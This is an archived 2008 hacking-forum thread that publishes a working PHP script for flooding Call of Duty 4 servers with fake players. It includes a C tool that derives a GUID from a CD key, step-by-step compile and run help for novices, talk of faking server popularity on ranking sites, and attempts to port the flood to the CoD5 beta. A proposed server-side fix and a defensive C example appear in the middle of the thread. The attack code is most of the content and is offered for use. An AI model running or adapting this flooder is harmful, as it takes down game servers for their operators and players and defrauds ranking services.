Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)

All times are UTC [ DST ]





 Post subject: Fake Player DoS -- COD4
PostPosted: 31 Jul 2008 12:48 

Joined: 16 Aug 2007 06:25
Posts: 367
General info: So there were a few threads about a CoD4 fake player DoS, and I decided to look into it. After playing around, I found that it's possible to flood a CoD4 server with fake players, with only 1 cd-key. Forgive me if a new topic is annoying, but I figured it's better than hijacking someone else's thread, and then having all this information get lost at the bottom :P.

Info about the fake players:
- They show in the server list, and all players will see them.
- Admins can see all the fake players' IP and GUID via the server's console -- so they can ban you by either, be careful.
- 1 fake player lasts about 15 - 20 seconds before it times out. After timing out, a message shows in the server to all players, and in the server's console, that the player has timed out.

Information about my code:
- PHP (command line)
- It's probably sloppy, redundant, etc. Sorry! But it works. Feel free to modify it however you wish though if you are working on your own project.
- You will need to compile the key->guid C code (provided below) into an executable. This executable will be used by the php script to compute the GUID of the cd-key. I will not provide a compiled version because it's stupid to make people give their cd-key to an unknown executable file :P. The php script calls exec() on this executable with the cd-key, and the executable returns the guid of the cd-key needed for fake players. There is probably easier PHP code to compute this (without having to use a binary), but I don't have the greatest knowledge of going from C to PHP so I can't do that yet. Sorry! Maybe someone else can.
Edit: I don't know why I didn't think about this, but you can just get your GUID via console or packet sniffing, and bypass the whole executable thing altogether. The only disadvantage is you can't quickly change keys.
- Run it from the command line like so: php script.php server port cdkey
- The script sends an infinite amount of players until forcefully quit (CTRL+C).
- The command line will spit out a character or letter for each fake player attempt which has a meaning:
. (Fake player added to the server)
f (Server is currently full)
c (timeout after 1 second getting challenge from server)
n (Server replied with needcdkey, meaning the master server needs your cd-key again, so it was sent again)
b (cd-key is already in use by a fully-connected player somewhere else, or the cd-key is invalid)
u (server replied with an unknown response after requesting challenge. it should rarely do this, and it's not a big problem if it happens. some servers seem to send random garbage replies for whatever reason. this letter can also mean the server is offline.)
v (same as u, except this time the unknown reply happened after sending the connect string)

Pictures:
- Normal output (. means a fake player was added, f means the server was full, so the fake player DoS worked by sending fake players as needed. "v" was a hiccup along the way, must have been bad data):
- Proof the server was filled with fake players:
PHP Code:
Code:
<?php

   if (count($_SERVER['argv']) != 4) {

      echo ("\n\n" . "Check your arugments. Must start like:" . "\n" . "file.php cod4server cod4serverport key" . "\n\n");

   } else {

//generates a random string, in our case the fake players' names
   function random_letters ($numofletters=8) {
       $v="";
        for($i=0;$i<$numofletters;$i++) $v.=chr(rand(65,90));
        return $v;
   }

   $cod4masterserver = "cod4master.activision.com";
   $cod4masterserverport = "20800";
   $cod4server = $argv[1];
   $cod4serverport = $argv[2];
   $cod4key = $argv[3];
   $first16key = substr($cod4key, 0, 16);
   //path to the executable that calculates the guid from the cdkey. be sure to change this to fit your needs.
   $pbguid = exec("/home/user/cod4key2guid " . $first16key);
   $masterstring = "\xff\xff\xff\xffgetKeyAuthorize 0 " . $first16key . " PB " . $pbguid;
   $serverstring = "\xff\xff\xff\xff" . 'getchallenge 0 "' . $pbguid . '"';

   //Send master server the key once. If needed again, it will be sent again automatically
   $udpmaster = fsockopen("udp://" . $cod4masterserver, $cod4masterserverport);
   fwrite($udpmaster, $masterstring);

//begin sending infinite fake players. "stop" never changes from 0, so the loop continues forever (until you hit ctrl+c)
$stop = 0;
while($stop == 0){

   $fakeplayer = random_letters();
   $udpserverfirst = fsockopen("udp://" . $cod4server, $cod4serverport);
   fwrite($udpserverfirst, $serverstring);
   stream_set_timeout($udpserverfirst, 1);
   $udpserverfirstresponse = ''.fread($udpserverfirst, 1400);
   $udpserverfirstinfo = stream_get_meta_data($udpserverfirst);
   if ($udpserverfirstinfo['timed_out']) {
      echo("c");
   } else {
      if(substr($udpserverfirstresponse, 0, 21) != "\xff\xff\xff\xffchallengeResponse"){
         if($udpserverfirstresponse == "\xff\xff\xff\xffneedcdkey"){
            fwrite($udpmaster, $masterstring);
            echo ("n");
         } else {
            if($udpserverfirstresponse == "\xff\xff\xff\xfferror\x0aEXE_ERR_CDKEY_IN_USE"){
            echo ("b");
         } else {
            echo("u");
         }}
      } else {
         $challenge = substr($udpserverfirstresponse, 22, 20);
         $connectstring = ("\xff\xff\xff\xff" . 'connect "\\cg_predictItems\\1\\cl_anonymous\\0\\cl_punkbuster\\1\\cl_voice\\1\\cl_wwwDownload\\1\\rate\\25000\\snaps\\20\\name\\' . $fakeplayer . '\\protocol\\6\\challenge\\' . $challenge . '\\qport\\' . rand(10000, 65534) . '"');
         fwrite($udpserverfirst, $connectstring);
         $finalresponse = ''.fread($udpserverfirst, 1400);
         if ($finalresponse != "\xff\xff\xff\xffconnectResponse\x20"){
            if($finalresponse == "\xff\xff\xff\xfferror\x0aEXE_SERVERISFULL"){
            echo("f");
            } else {
            echo("v");
            }
         } else {
            echo ".";
         }}}}
}
?>


cod4key2guid.c
Code:
/*

   cod4key2guid
   by pierz 06/2008
   http://www.indahax.com

   modified by SomaFM to output only the guid

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "md5.c"

void cod4_md5_init(md5_context *pms) {

    pms->total[0] = pms->total[1] = 0;

   pms->state[0] = 0x6F1CD602;
    pms->state[1] = 0x226C74BE;
    pms->state[2] = 0xB31C088D;
    pms->state[3] = 0x555A9639;

}

int main(int argc, char *argv[]) {
    int             i,
                    x;
    md5_context     md5t;
    unsigned char   md5h[16],
                    guid[33];

    const char      *hex = "0123456789abcdef";

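   if(argc < 2){

      printf("usage : ./c4key2guid <key>\n");
      return -1;

   }

   //the GUID is computed from the first 16 characters of the key, so reject
   //shorter input instead of reading and writing past the end of argv[1]
   if(strlen(argv[1]) < 16){

      fprintf(stderr, "error : key must be at least 16 characters\n");
      return -1;

   }

   //lowercase the first 16 characters and cut the key there
   for(i=0;i<16;i++)
      argv[1][i] = tolower((unsigned char)argv[1][i]);

   argv[1][16] = '\0';

    //MD5 with the non-standard initial state set in cod4_md5_init()
    cod4_md5_init(&md5t);
    md5_update(&md5t, (uint8 *)argv[1], strlen(argv[1]));
    md5_finish(&md5t, md5h);

    //hex-encode the 16-byte digest
    for(i = 0, x = 0; i < 16; i++) {
        guid[x++] = hex[md5h[i] >> 4];
        guid[x++] = hex[md5h[i] & 0xf];
    }
    guid[x] = 0;

    //print through a format string rather than passing the buffer as the format
    printf("%s", (char *)guid);

   return(0);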
}


md5.h (needed to compile cod4key2guid.c)
Code:
#ifndef _MD5_H
#define _MD5_H

#ifndef uint8
#define uint8  unsigned char
#endif

#ifndef uint32
#define uint32 unsigned long int
#endif

typedef struct
{
    uint32 total[2];
    uint32 state[4];
    uint8 buffer[64];
}
md5_context;

void md5_starts( md5_context *ctx );
void md5_update( md5_context *ctx, uint8 *input, uint32 length );
void md5_finish( md5_context *ctx, uint8 digest[16] );

#endif /* md5.h */


md5.c (needed to compile cod4key2guid.c)
Code:
/*
*  RFC 1321 compliant MD5 implementation
*
*  Copyright (C) 2001-2003  Christophe Devine
*
*  This program is free software; you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation; either version 2 of the License, or
*  (at your option) any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program; if not, write to the Free Software
*  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

#include <string.h>

#include "md5.h"

#define GET_UINT32(n,b,i)                       \
{                                               \
    (n) = ( (uint32) (b)[(i)    ]       )       \
        | ( (uint32) (b)[(i) + 1] <<  8 )       \
        | ( (uint32) (b)[(i) + 2] << 16 )       \
        | ( (uint32) (b)[(i) + 3] << 24 );      \
}

#define PUT_UINT32(n,b,i)                       \
{                                               \
    (b)[(i)    ] = (uint8) ( (n)       );       \
    (b)[(i) + 1] = (uint8) ( (n) >>  8 );       \
    (b)[(i) + 2] = (uint8) ( (n) >> 16 );       \
    (b)[(i) + 3] = (uint8) ( (n) >> 24 );       \
}

void md5_starts( md5_context *ctx )
{
    ctx->total[0] = 0;
    ctx->total[1] = 0;

    ctx->state[0] = 0x67452301;
    ctx->state[1] = 0xEFCDAB89;
    ctx->state[2] = 0x98BADCFE;
    ctx->state[3] = 0x10325476;

}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0],  data,  0 );
    GET_UINT32( X[1],  data,  4 );
    GET_UINT32( X[2],  data,  8 );
    GET_UINT32( X[3],  data, 12 );
    GET_UINT32( X[4],  data, 16 );
    GET_UINT32( X[5],  data, 20 );
    GET_UINT32( X[6],  data, 24 );
    GET_UINT32( X[7],  data, 28 );
    GET_UINT32( X[8],  data, 32 );
    GET_UINT32( X[9],  data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

#define P(a,b,c,d,k,s,t)                                \
{                                                       \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;           \
}

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

    P( A, B, C, D,  0,  7, 0xD76AA478 );
    P( D, A, B, C,  1, 12, 0xE8C7B756 );
    P( C, D, A, B,  2, 17, 0x242070DB );
    P( B, C, D, A,  3, 22, 0xC1BDCEEE );
    P( A, B, C, D,  4,  7, 0xF57C0FAF );
    P( D, A, B, C,  5, 12, 0x4787C62A );
    P( C, D, A, B,  6, 17, 0xA8304613 );
    P( B, C, D, A,  7, 22, 0xFD469501 );
    P( A, B, C, D,  8,  7, 0x698098D8 );
    P( D, A, B, C,  9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12,  7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

    P( A, B, C, D,  1,  5, 0xF61E2562 );
    P( D, A, B, C,  6,  9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A,  0, 20, 0xE9B6C7AA );
    P( A, B, C, D,  5,  5, 0xD62F105D );
    P( D, A, B, C, 10,  9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A,  4, 20, 0xE7D3FBC8 );
    P( A, B, C, D,  9,  5, 0x21E1CDE6 );
    P( D, A, B, C, 14,  9, 0xC33707D6 );
    P( C, D, A, B,  3, 14, 0xF4D50D87 );
    P( B, C, D, A,  8, 20, 0x455A14ED );
    P( A, B, C, D, 13,  5, 0xA9E3E905 );
    P( D, A, B, C,  2,  9, 0xFCEFA3F8 );
    P( C, D, A, B,  7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F
   
#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D,  5,  4, 0xFFFA3942 );
    P( D, A, B, C,  8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D,  1,  4, 0xA4BEEA44 );
    P( D, A, B, C,  4, 11, 0x4BDECFA9 );
    P( C, D, A, B,  7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13,  4, 0x289B7EC6 );
    P( D, A, B, C,  0, 11, 0xEAA127FA );
    P( C, D, A, B,  3, 16, 0xD4EF3085 );
    P( B, C, D, A,  6, 23, 0x04881D05 );
    P( A, B, C, D,  9,  4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A,  2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D,  0,  6, 0xF4292244 );
    P( D, A, B, C,  7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A,  5, 21, 0xFC93A039 );


    P( A, B, C, D, 12,  6, 0x655B59C3 );
    P( D, A, B, C,  3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A,  1, 21, 0x85845DD1 );
    P( A, B, C, D,  8,  6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B,  6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D,  4,  6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B,  2, 15, 0x2AD7D2BB );
    P( B, C, D, A,  9, 21, 0xEB86D391 );

#undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx->total[0] & 0x3F;
    fill = 64 - left;

    ctx->total[0] += length;
    ctx->total[0] &= 0xFFFFFFFF;

    if( ctx->total[0] < length )
        ctx->total[1]++;

    if( left && length >= fill )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx->buffer );
        length -= fill;
        input  += fill;
        left = 0;
    }

    while( length >= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input  += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx->buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];

    high = ( ctx->total[0] >> 29 )
         | ( ctx->total[1] <<  3 );
    low  = ( ctx->total[0] <<  3 );

    PUT_UINT32( low,  msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    last = ctx->total[0] & 0x3F;
    padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last );

    md5_update( ctx, md5_padding, padn );
    md5_update( ctx, msglen, 8 );

    PUT_UINT32( ctx->state[0], digest,  0 );
    PUT_UINT32( ctx->state[1], digest,  4 );
    PUT_UINT32( ctx->state[2], digest,  8 );
    PUT_UINT32( ctx->state[3], digest, 12 );
}

#ifdef TEST

#include <stdlib.h>
#include <stdio.h>

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

int main( int argc, char *argv[] )
{
    FILE *f;
    int i, j;
    char output[33];
    md5_context ctx;
    unsigned char buf[1000];
    unsigned char md5sum[16];

    if( argc < 2 )
    {
        printf( "\n MD5 Validation Tests:\n\n" );

        for( i = 0; i < 7; i++ )
        {
            printf( " Test %d ", i + 1 );

            md5_starts( &ctx );
            md5_update( &ctx, (uint8 *) msg[i], strlen( msg[i] ) );
            md5_finish( &ctx, md5sum );

            for( j = 0; j < 16; j++ )
            {
                sprintf( output + j * 2, "%02x", md5sum[j] );
            }

            if( memcmp( output, val[i], 32 ) )
            {
                printf( "failed!\n" );
                return( 1 );
            }

            printf( "passed.\n" );
        }

        printf( "\n" );
    }
    else
    {
        if( ! ( f = fopen( argv[1], "rb" ) ) )
        {
            perror( "fopen" );
            return( 1 );
        }

        md5_starts( &ctx );

        while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
        {
            md5_update( &ctx, buf, i );
        }

        md5_finish( &ctx, md5sum );

        for( j = 0; j < 16; j++ )
        {
            printf( "%02x", md5sum[j] );
        }

        printf( "  %s\n", argv[1] );
    }

    return( 0 );
}

#endif


 
 
 Post subject:
PostPosted: 01 Aug 2008 05:56 

Joined: 16 Aug 2007 06:25
Posts: 367
A bit more info:

- It appears that spoofing the source address/port for your connect string will not work. If a source address/port requests to connect with a challenge that was not created by itself, the server will reply with EXE_BAD_CHALLENGE. So basically, the challenge is only good for the socket it was created on.

- A fix for this fake players DoS would be for the developers to make the game mark the key as globally in use (EXE_ERR_CDKEY_IN_USE) when the client sends the connect string. This would mean a malicious user would need a different key for each fake player.


Top
 Profile  
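The fix proposed in the post above (treat the key as in use from the moment the connect string arrives), shown beside the behaviour the thread describes. This is an added example, not CoD4 code and not from the thread's author; it is a per-server simplification of the "globally in use" idea, and the slot table, function names, capacity and the second GUID are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SLOTS       8    /* constructed: small capacity for the demo */
#define GUID_LEN        32
#define CONNECT_TIMEOUT 20   /* seconds; the thread reports drops after 15-20 s */

enum admit { ADMIT_OK, ADMIT_KEY_IN_USE, ADMIT_SERVER_FULL, ADMIT_BAD_GUID };

struct slot {
    int  used;
    char guid[GUID_LEN + 1];
    long last_packet;        /* time of the last packet seen from this client */
};

struct server {
    struct slot slots[MAX_SLOTS];
};

/* Free every slot whose client has been silent for CONNECT_TIMEOUT seconds. */
static void expire_slots(struct server *sv, long now)
{
    for (int i = 0; i < MAX_SLOTS; i++)
        if (sv->slots[i].used && now - sv->slots[i].last_packet >= CONNECT_TIMEOUT)
            sv->slots[i].used = 0;
}

int slots_in_use(const struct server *sv)
{
    int n = 0;
    for (int i = 0; i < MAX_SLOTS; i++)
        n += sv->slots[i].used;
    return n;
}

/*
 * Handle a connect request that has already passed the challenge check.
 * unique_guid == 0: behaviour described in the thread (GUID not checked here).
 * unique_guid != 0: proposed fix, a GUID holding a slot cannot take a second one.
 */
enum admit admit_connect(struct server *sv, const char *guid, long now, int unique_guid)
{
    int free_slot = -1;

    if (strlen(guid) != GUID_LEN)
        return ADMIT_BAD_GUID;

    expire_slots(sv, now);
    for (int i = 0; i < MAX_SLOTS; i++) {
        if (!sv->slots[i].used) {
            if (free_slot < 0)
                free_slot = i;
        } else if (unique_guid && strcmp(sv->slots[i].guid, guid) == 0) {
            return ADMIT_KEY_IN_USE;   /* same key already pending or connected */
        }
    }
    if (free_slot < 0)
        return ADMIT_SERVER_FULL;

    sv->slots[free_slot].used = 1;
    memcpy(sv->slots[free_slot].guid, guid, GUID_LEN + 1);
    sv->slots[free_slot].last_packet = now;
    return ADMIT_OK;
}

/*
 * Constructed scenario: one GUID sends a connect every second for `seconds`
 * seconds and never follows up. Returns the peak number of occupied slots.
 */
int peak_usage_single_guid(struct server *sv, int seconds, int unique_guid)
{
    /* placeholder GUID used in the thread's instructions */
    static const char guid[] = "1234567890abcdef1234567890abcdef";
    int peak = 0;

    memset(sv, 0, sizeof *sv);
    for (long t = 0; t < seconds; t++) {
        admit_connect(sv, guid, t, unique_guid);
        if (slots_in_use(sv) > peak)
            peak = slots_in_use(sv);
    }
    return peak;
}

int main(void)
{
    struct server sv;
    const char *other = "fedcba0987654321fedcba0987654321"; /* constructed GUID */

    int before = peak_usage_single_guid(&sv, 30, 0);
    int real_before = admit_connect(&sv, other, 30, 0);
    int after = peak_usage_single_guid(&sv, 30, 1);
    int real_after = admit_connect(&sv, other, 30, 1);

    printf("no GUID check: peak %d/%d slots, real player %s\n", before, MAX_SLOTS,
           real_before == ADMIT_OK ? "admitted" : "rejected");
    printf("GUID check:    peak %d/%d slots, real player %s\n", after, MAX_SLOTS,
           real_after == ADMIT_OK ? "admitted" : "rejected");
    return 0;
}
```

With the check enabled, filling the server takes one valid key per occupied slot, which is the cost increase the post describes.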
 
 Post subject:
PostPosted: 03 Aug 2008 06:29 

Joined: 26 Jul 2008 03:18
Posts: 9
:) i just tried it and it works :)


 
 Post subject:
PostPosted: 03 Aug 2008 08:16 

Joined: 24 Jul 2008 16:36
Posts: 4
i appreciate ur hard work thanks a lot


Edit : could u plz tell me how to do it its hard for me to understand cuz my english is not that good .


 
 Post subject:
PostPosted: 03 Aug 2008 08:31 

Joined: 26 Jul 2008 03:18
Posts: 9
SomaFM if i generate a key from a keygen i then use cod4key2guid, it works online?

i did try but i got 16 numbers what should i do with the 16 numbers?

by the way nice work


 
 Post subject:
PostPosted: 03 Aug 2008 09:17 

Joined: 16 Aug 2007 06:25
Posts: 367
monstorrrr wrote:
SomaFM if i generate a key from a keygen i then use cod4key2guid, it works online?

i did try but i got 16 numbers what should i do with the 16 numbers?

by the way nice work


Keygen keys normally don't output keys that work online, but instead keys that match just the algorithm (to install the game or whatever). I'm not sure what you mean by "what sould i do with the 16 numbers". The first 16 characters of the cd-key are used to generate the GUID which is needed in the connection process. The script automatically gets the first 16 of your key for you, and passes it on to the executable which generates your guid, so you don't need to worry about that.

united wrote:
i appreciate ur hard work thanks a lot


Edit : could u plz tell me how to do it its hard for me to understand cuz my english is not that good .


1) Compile the cod4key2guid executable using GCC. You can get GCC by installing dev-cpp. First make sure cod4key2guid.c, md5.h, and md5.c are all in the same folder, and then compile it from the command line. Example:
cd C:\Dev-Cpp\bin
gcc c:\code\cod4key2guid.c -o c:\cod4key2guid.exe


2) Change the following line in the php source:
$pbguid = exec("/home/user/cod4key2guid " . $first16key);

to match where your cod4key2guid.exe file is. For example:

$pbguid = exec("c:\\cod4key2guid.exe " . $first16key);

3) Navigate to your php executable via command line (this is a php-cli script after all):
cd c:\php

4) run the script:
php c:\cod4flooder.php server port cdkey


Alternative (and probably easier) way:

- If you don't plan on using multiple keys, you can skip steps 1 and 2, and just replace the following line:
$pbguid = exec("/home/user/cod4key2guid " . $first16key);

with

$pbguid = "1234567890abcdef1234567890abcdef";

where 1234567890abcdef1234567890abcdef is your guid.


 
 Post subject:
PostPosted: 03 Aug 2008 10:20 

Joined: 26 Jul 2008 03:18
Posts: 9
ok. let's see that i have 1 key i want to play with that key on 5 pc at the same time. how do i do that?


 
 Post subject:
PostPosted: 03 Aug 2008 10:31 

Joined: 16 Aug 2007 06:25
Posts: 367
monstorrrr wrote:
ok. let's see that i have 1 key i want to play with that key on 5 pc at the same time. how do i do that?


That's irrelevant to what this thread is about, and I don't think it would be easy if it were possible (at least for online servers).


 
 Post subject:
PostPosted: 04 Aug 2008 13:22 

Joined: 24 Jul 2008 16:36
Posts: 4
how could i create " cod4flooder.php " script :S

sorry for being a noob


 
 Post subject:
PostPosted: 04 Aug 2008 14:21 

Joined: 16 Aug 2007 06:25
Posts: 367
Open a text editor (notepad), copy the code into it, save the file as cod4flooder.php


 
 Post subject:
PostPosted: 12 Aug 2008 03:03 

Joined: 27 Jun 2008 07:41
Posts: 27
Say if somebody wanted to get their rank up on a server, would this tool seeing how it is able to log in everybody to the server.. could it possibly add time to the server and thereby increase its rank.

Thanks


 
 Post subject:
PostPosted: 12 Aug 2008 03:09 

Joined: 16 Aug 2007 06:25
Posts: 367
tictacman08 wrote:
Say if somebody wanted to get their rank up on a server, would this tool seeing how it is able to log in everybody to the server.. could it possibly add time to the server and thereby increase its rank.

Thanks


I'm confused as to what you're asking. Do you mean will this script increase a server's "rank", because it will appear to have more players all the time?

If that is the question, then I would say it depends on who is ranking the server, and how their ranking algorithm works. Say it was game-monitor... well then yes it would probably increase the rank because I'm sure player count is a factor they take into account. But I could never be 100% certain without seeing how they do it.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 31 Aug 2008 18:03 

Joined: 31 Aug 2008 17:48
Posts: 3
hey, great find. hopefully i can put this together and use this.

edit: having trouble with this.
what if i pmed you a extra cdkey, would you be able to compile it?


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Sep 2008 00:58 

Joined: 16 Aug 2007 06:25
Posts: 367
Grassi wrote:
hey, great find. hopefully i can put this together and use this.

edit: having trouble with this.
what if i pmed you a extra cdkey, would you be able to compile it?


There is no compiling this particular script into an executable, you will have to re-write the code into another language if you want it in that form (unless someone knows of a php compiler that I am not aware of, but I have never heard of such a thing that actually works). But it's really pretty easy to get it running. You do have to compile the "cod4key2guid" program if you want the ability to use raw cd-keys (instead of the guid).

But if you know how to find your cd-key's guid, you can use my "Alternative (and probably easier) way" that I mentioned in a previous post to where no compiling is required. Where exactly are you running into trouble though?


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Sep 2008 02:59 

Joined: 31 Aug 2008 17:48
Posts: 3
Well, I'm confused. So, I need to compile cod4key2guid program along with md5.c and md5.h? I will post screenshots too if it will help me explain.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Sep 2008 03:57 

Joined: 16 Aug 2007 06:25
Posts: 367
Grassi wrote:
Well, I'm confused. So, I need to compile cod4key2guid program along with md5.c and md5.h? I will post screenshots too if it will help me explain.


If you know you will be using just 1 cd-key, you don't even have to worry about compiling cod4key2guid. Just replace
$pbguid = exec("/home/user/cod4key2guid " . $first16key);
with
$pbguid = "1234567890abcdef1234567890abcdef";

in the php script. Make sure to replace 1234567890abcdef1234567890abcdef with your cd-key's GUID (which can be found in console using pb_myguid after connecting to a server). Then just run the script using php in the command line like so: php cod4.php serverip port cdkey

The files cod4key2guid.c, md5.c, and md5.h are all un-needed if you plan to use just 1 cd-key.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 17 Sep 2008 22:28 

Joined: 27 Jun 2008 07:41
Posts: 27
Hey Soma,

Thanks for the reply.

In regards to server ranking, most sites "rank" servers by the amount of time users spend on their server. What I'm asking is whether it is possible to flood say an empty server for 24 hours. If the server was "full" for 24 hours the server rank would go up because it's very popular.

Popular servers appear at the top of the list, so you can potentially get real people in. I was just curious if this fake player script can manipulate player data like that.

- The system monitoring the server is: GameTracker and Game Monitor.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 18 Sep 2008 00:27 

Joined: 16 Aug 2007 06:25
Posts: 367
tictacman08 wrote:
Hey Soma,

Thanks for the reply.

In regards to server ranking, most sites "rank" servers by the amount of time users spend on their server. What I'm asking is whether it is possible to flood say an empty server for 24 hours. If the server was "full" for 24 hours the server rank would go up because it's very popular.

Popular servers appear at the top of the list, so you can potentially get real people in. I was just curious if this fake player script can manipulate player data like that.

- The system monitoring the server is: GameTracker and Game Monitor.


Yes, when the CoD4 servers are queried the fake players show up as active players in the server (unlike a BF2 fake player dos). However, I don't know of a way to keep the SAME players in there (since the fake players drop after 20 seconds), so the players will always have different names, but the server will appear to always be full.

I'm not sure if you care about the same players being in there, or if you just want to have a full server. Hope that helps.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 31 Oct 2008 22:46 

Joined: 31 Oct 2008 22:40
Posts: 2
Hey how can i get the new udp packet info for the new cod5 beta so i can flood the servers, any tips? they have changed since cod4 but i have noticed it is still linking back to the cod4masterserver, i need help.

tried using cod4 dos, didn't work, just kept getting v's outputting

to get cod5 beta just register on the official site, a key will be sent to you.

Update: Tried using wireshark to scan for udp, didn't work, hmm will try a few other programs.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Nov 2008 15:54 

Joined: 24 Sep 2007 02:12
Posts: 1114
Location: http://sethioz.co.uk
wireshark sucks big time. use commview, best packet editor I've seen so far.
you don't even need any filtering in version 6 and above. you can simply enable process filtering, so it captures packets only sent and/or received by that process.


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Nov 2008 16:00 

Joined: 16 Aug 2007 06:25
Posts: 367
I tried the beta, and it looks like they added/changed some things:

- The cod4key2guid doesn't generate the correct guid for the getchallenge string in cod5; however, you could just locate your guid with a packet scan and use it (like shown in my previous posts for cod4). Someone will probably have to reverse how it's done again if the key>guid feature is wanted.
- The challengeResponse string is now 9 numbers, a space, and an additional string. It ends up looking like "123456789 ABokJjzbp6H=". I don't know what the additional string is used for.
- Protocol was changed to 1982 in the connect string.
- There are 2 additional fields in the connect string called bdTicket and bdTicketTime. I have no idea what these are, or how to generate them, but it looks like they are required to be 'accurately' generated or you will get error replies.

I think if we can just figure out how to generate bdTicket and bdTicketTime fields, a flooder is possible for cod5. I did some tweaking with the script, but kept running into the EXE_BAD_CHALLENGE error according to my packet scans. That's all I have for the moment =(

Edit: After looking a little further, after the server sends the challengeResponse packet, the client then makes a TCP connection to a separate server (cod5-pc-beta.auth.mmp3.demonware.net) and sends encrypted data to that server. This 'auth server' then replies with encrypted data. Then the communication with the game server then continues on with the connect string. So this 'auth server' probably plays a big role in connecting. It seems they have upped the complexity of the protocol quite a bit, so it will definitely take some good reversing :P


 
 Post subject: Re: Fake Player DoS -- COD4
PostPosted: 01 Nov 2008 20:22 

Joined: 31 Oct 2008 22:40
Posts: 2
Nice good work SomaFM you are very smart.

